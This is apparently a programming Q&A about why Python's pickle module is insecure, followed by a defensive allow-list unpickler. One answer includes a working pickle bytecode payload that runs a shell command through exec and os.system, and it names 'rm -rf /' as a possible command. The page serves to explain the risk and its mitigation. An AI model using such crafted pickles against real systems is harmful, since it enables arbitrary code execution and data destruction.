Reputation: 110267
From the Python docs for pickle:
Warning The pickle module is not secure. Only unpickle data you trust.
What would be an example of pickling and then un-pickling data that would do something malicious? I've only ever used pickle to save objects that don't necessarily JSON-encode well (date, decimal, etc.), so I don't have much experience with it or what it's capable of outside of being a "simpler JSON" encoder.
What would be an example of something malicious that could be done with it?
Upvotes: 2
Views: 265
Reputation: 101
Like Chase said, functions can be executed by unpickling. According to this source: https://intoli.com/blog/dangerous-pickles/, pickled objects are actually stored as bytecode instructions which are interpreted on opening (similar to Python itself). By writing pickle bytecode, it's possible to make a pickle "program" to do anything.
Here I made a pickle program to run the bash command say "malicious code", but you could run commands like rm -rf / as well.
I saved the following bytecode to a file:
c__builtin__
exec
(Vimport os; os.system('say "malicious code"')
tR.
and then unpickled it with:
import pickle

# Loading the crafted file runs the embedded exec call immediately.
with open('malicious', 'rb') as loadfile:
    data = pickle.load(loadfile)
I immediately heard some "malicious code".
Upvotes: 2
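The mitigation the pickle docs point to for this, as an added example that is not part of the question or the answer above: subclass pickle.Unpickler and override find_class so that only an allow-list of globals can be resolved, which blocks the GLOBAL/REDUCE trick the answer's payload relies on. The allow-list, the benign sample and the copy of the answer's payload bytes are constructed for the demo.

```python
import datetime
import decimal
import io
import pickle

# Only these (module, name) pairs may be resolved (constructed for this demo).
SAFE_GLOBALS = {("datetime", "date"), ("datetime", "datetime"),
                ("decimal", "Decimal")}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler whose find_class() only honours the allow-list.
    The GLOBAL opcode ('c' in the answer's payload) makes the stock
    unpickler import any module and fetch any attribute, and REDUCE
    ('R') then calls it; refusing unknown names stops that before the call.
    """

    def find_class(self, module, name):
        # The stock unpickler maps Python 2 names (__builtin__ -> builtins);
        # apply the same mapping so the alias cannot sidestep the list.
        if module == "__builtin__":
            module = "builtins"
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    """Drop-in replacement for pickle.loads() that enforces the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Constructed input: the same protocol-0 bytecode shown in the answer.
MALICIOUS = (b"c__builtin__\nexec\n"
             b"(Vimport os; os.system('say \"malicious code\"')\ntR.")

# Constructed input: the kind of benign data the question mentions.
BENIGN = pickle.dumps({"when": datetime.date(2024, 1, 2),
                       "amount": decimal.Decimal("9.99")})


def demo():
    """Return (malicious_was_rejected, benign_object)."""
    try:
        restricted_loads(MALICIOUS)
        rejected = False
    except pickle.UnpicklingError:
        rejected = True
    return rejected, restricted_loads(BENIGN)
```

The crafted file is refused at the GLOBAL opcode, before exec is ever looked up, while the date/Decimal dict round-trips normally.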